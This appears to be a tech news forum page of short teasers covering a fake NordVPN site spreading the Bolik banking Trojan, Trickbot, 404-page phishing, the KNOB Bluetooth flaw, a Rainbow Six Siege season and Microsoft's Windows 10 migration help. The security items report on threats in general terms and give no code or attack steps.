By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy

The attackers who previously breached and abused the website of free multimedia editor VSDC to distribute the Win32.Bolik.2 banking Trojan have now switched their tactics. While previously they hacked legitimate websites to hijack download links infected with malware, the hackers are now creating website clones to deliver banking Trojans onto unsuspecting victims' computers. This allows them to focus on adding capabilities to their malicious tools instead of wasting time by trying to infiltrate the servers and websites of legitimate businesses. More to the point, they are actively distributing the bank Win32.Bolik.2 banking Trojan via the nord-vpn[.]club website, an almost perfect clone of the official nordvpn.com site used by the popular NordVPN VPN service. The cloned website also has a valid SSL certificate issued by open certificate authority Let’s Encrypt on August 3, with an expiration date of November 1. "Win32.Bolik.2 trojan is an improved version of Win32.Bolik.1 and has qualities of a multicomponent polymorphic file virus," state the Doctor Web researchers who spotted the campaign. "Using this malware, hackers can perform web injections, traffic intercepts, keylogging and steal information from different bank-client systems." The operators behind this malicious campaign have launched their attacks on August 8, they are focusing on English-speaking targets and, according to the researchers, thousands have already visited the nord-vpn[.]club website in search of a download link for the NordVPN client. "The actor is interested in English speaking victims (US/CA/UK/AU). However, he can make exceptions if the victim is valuable," Doctor Web malware analyst Ivan Korolev told BleepingComputer.  To learn more please visit OUR FORUM.

Ubisoft continues to build upon Tom Clancy's Rainbow Six Siege, soon securing its next major expansion. Following Operation Phantom Sight, the update is headed to the Latin American underworld, falling midway through its fourth year of content.  Two new resourceful Operators lie on the horizon of Operation Ember Rise, set to shake up how defenders lock down the objective. We've wrapped up everything we know so far about the Rainbow Six Siege's next season, ahead of its August 18 unveiling. Ubisoft has dropped its first teaser image for Year 4 Season 3, confirming the coming update's title, Operation Ember Rise. While Ubisoft is yet to outline its Operation Ember Rise release plans, a late-summer launch is expected for Xbox One, PlayStation 4, and PC. As with prior Rainbow Six Siege updates, the third season of 2019 drops two new playable Operators, expanding the ever-growing roster to 50 recruits. Outlined in Ubisoft's Year 4 roadmap, the latest members span independent counterterrorism units (CTUs), hailing from Mexican and Peruvian specialist forces. Expect new attacking and defending talent, sticking to a familiar seasonal template. While Ubisoft hasn't formally unveiled its upcoming Latin duo, brief teasers have surfaced throughout Year 4. Promotional assets for ringleader Harry "Six" Pandey left reference to narcotics crackdowns, singling cartel activity in each Operator's home turf. Addressing a "Crosscheck w/ Capitao anti-drug operations for common ground" and "Antiquities trafficking," it establishes a clear future expansion beyond existing lore. The same pinboard also dropped tease of Operation Phantom Sight's Nøkk and Warden, alongside remaining threads still to uncover. For more complete details along with dates, more images and a video clip visit OUR FORUM.

Head for the hills, folks! It’s not often that we cover security here, but serious times call for serious talk. There is a trojan called Trickbot, and it is one of the stealthiest malware threats in recent memory. Doesn’t help that it is going after anything and everything that crosses its path. And to make matters worse, this is a rapidly evolving threat. The latest twist in its tale is that it is targeting Windows 10 users specifically via new methods that not only evade but actually disable Windows Defender on these systems. Trickbot may be in the news for all the wrong reasons these days, but this malware is not new. It has been causing trouble since 2016. Since then, this banking trojan is estimated to have compromised no less than 250 million email accounts. So much so that many in the cybersecurity world consider Trickbot as the topmost threat targeting the computing landscape. This malware is designed with a laser focus on stealing the private data of users. Whether it be harvesting emails or stealing logins and passwords, hijacking web browsers or altering displayed websites, stealing banking details or transferring money out of crypto wallets, Trickbot is doing it all. The developers behind Trickbot have updated this malware numerous times over the years, adding advanced new traits every time. One of these features is screen locking, where the more recent versions of Trickbot are capable of locking the computer screens of the victims. What’s even worse, and an extremely dangerous addition is the capability of hijacking several different kinds of applications and then stealing credentials, recording information relating to web browsing, as well as system details itself like the CPU, operating system and running processes. Complete details can be found on OUR FORUM.

Microsoft security researchers discovered an unusual phishing campaign which employs custom 404 error pages to trick potential victims into handing out their Microsoft credentials. To do this, the attackers register a domain and instead of creating a single phishing landing page to redirect their victims to, they configure a custom 404 page which shows the fake login form. This allows the phishers to have an infinite amount of phishing landing pages URLs generated with the help of a single registered domain. "The 404 Not Found page tells you that you’ve hit a broken or dead link – except when it doesn’t," says Microsoft's research team. "Phishers are using malicious custom 404 pages to serve phishing sites. A phishing campaign targeting Microsoft uses such technique, giving phishers virtually unlimited phishing URLs." "Phishers are using malicious custom 404 pages to serve phishing sites. A phishing campaign targeting Microsoft uses such technique, giving phishers virtually unlimited phishing URLs." The custom 404 error pages these attackers use to harvest their victims' credentials are perfectly camouflaged as legitimate Microsoft account sign-in pages, down to the smallest details. All the links on the phishing page, including the ones at the bottom and the ones used to access one's Microsoft account and to create a new one, are directing straight to official Microsoft login forms in an effort to make targets less suspicious. The only elements missing from the phishing page are the "Sign-in options" link above the "Next" button and the cookies notification at the top of the page. "Because the malformed 404 pages are served to any non-existent URL in an attacker-controlled domain, the phishers can use random URLs for their campaigns," adds Microsoft. "We also found that the attackers randomize domains, exponentially increasing the number of phishing URLs." Learn more by visiting OUR FORUM.

A new Bluetooth vulnerability named "KNOB" has been disclosed that allow attackers to more easily brute force the encryption key used during pairing to monitor or manipulate the data transferred between two paired devices. In a coordinated disclosure between Center for IT-Security, Privacy and Accountability (CISPA), ICASI, and ICASI members such as Microsoft, Apple, Intel, Cisco, and Amazon, a new vulnerability called "KNOB" has been disclosed that affects Bluetooth BR/EDR devices, otherwise known as Bluetooth Classic, using specification versions 1.0 - 5.1. This flaw has been assigned CVE ID CVE-2019-9506 and allows an attacker to reduce the length of the encryption key used for establishing a connection. In some cases, an attacker could reduce the length of an encryption key to a single octet. "The researchers identified that it is possible for an attacking device to interfere with the procedure used to set up encryption on a BR/EDR connection between two devices in such a way as to reduce the length of the encryption key used," stated an advisory on Bluetooth.com. "In addition, since not all Bluetooth specifications mandate a minimum encryption key length, it is possible that some vendors may have developed Bluetooth products where the length of the encryption key used on a BR/EDR connection could be set by an attacking device down to a single octet." This reduction in key length would make it much easier for an attacker to brute force the encryption key used by the paired devices to communicate with each other. Once the key was known to the attackers, they could monitor and manipulate the data being sent between the devices. This includes potentially injecting commands, monitoring keystrokes, and other types of behavior. Full details are posted on OUR FORUM.

The company launches FastTrack for Windows 10 guidance, providing experts who can talk through deployment scenarios with partners. Microsoft Monday unveiled a new benefit for partners that are moving customers from Windows 7 to Windows 10, with the company now offering expert assistance around Windows 10 deployments. The end of support date for Windows 7 is set for Jan. 14, 2020, and Microsoft has made a series of investments to help with the transition, said Bob Davis, corporate vice president for Microsoft 365, in a blog post. The latest of these investments is the launch of FastTrack for Windows 10 deployment guidance. The benefit takes the form of free expert assistance on Windows 10 deployments for situations where there are at least 150 licenses of an eligible service or plan. "Sometimes you have a complex scenario and aren’t even sure where to start, or you’ve encountered a problem that has your migration stalled. There are times when you need to talk to an expert to get guidance on where to go next," Davis said.  FastTrack, Davis said in the post, will assist with envisioning a technical plan and determining how to deploy new users—and will continue to offer help throughout the deployment.

 

GTranslate